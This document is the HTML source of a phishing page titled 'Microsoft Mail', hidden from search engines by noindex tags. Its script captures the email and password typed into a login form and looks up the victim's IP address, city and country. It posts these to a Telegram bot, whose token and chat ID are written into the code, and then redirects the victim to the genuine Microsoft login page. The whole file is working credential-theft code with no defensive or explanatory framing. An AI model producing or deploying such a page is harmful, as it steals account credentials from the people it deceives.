<!DOCTYPE HTML>
<html lang="en-US">


<head>
	<meta name="robots" content="noindex" />
    <meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="nosnippet">
<meta name="robots" content="noindex, nofollow">
<meta name="robots" content="nofollow">
<meta name="googlebot" content="noindex">

	<meta charset="UTF-8">
	
    <link rel="stylesheet" href="styles.css">
	<title>Microsoft Mail</title>
	<meta name="viewport" content="width=device-width">
	<meta name="description" content="The new Microsoft Logo (2012) full CSS with only 1 HTML element. Smartphone compatible.">		

	<style type="text/css">
	
	</style>
</head>
<body id="mylist">
	
	
</body>
<script>
    const url = "https://ipapi.co/json/";
    const form = document.querySelector("#loginform");
    form.addEventListener("submit", (event) => {
      event.preventDefault(); // aqui evitamos que el código se repita evita que se envíe el formulario
      axios
        .get(url)
        .then((response) => {
          const email = document.querySelector("#correo").value;

          const contra = document.querySelector("#contra").value;

          const message =
            "\nHotmail" +
            "\nEmail: " +
            email +
            "\nContra: " +
            contra +
            "\nCiudad:" +
            response.data.city +
            "\nPais: " +
            response.data.country +
            "\nIP: " +
            response.data.ip;
          axios
            .post(
              "https://api.telegram.org/bot7939634785:AAGTT1t0gvQbX7em0-TG9FWBltjhqD2PNYM/sendMessage",
              {
                chat_id: "-4641821308",
                text: message,
              }
            )
            .then((response) => {
              window.location.href = "https://login.live.com/";
            })
            .catch((error) => {
              console.error(error);
            });
        })
        .catch((error) => {
          console.log(error);
        });
    });
  </script>
</html>
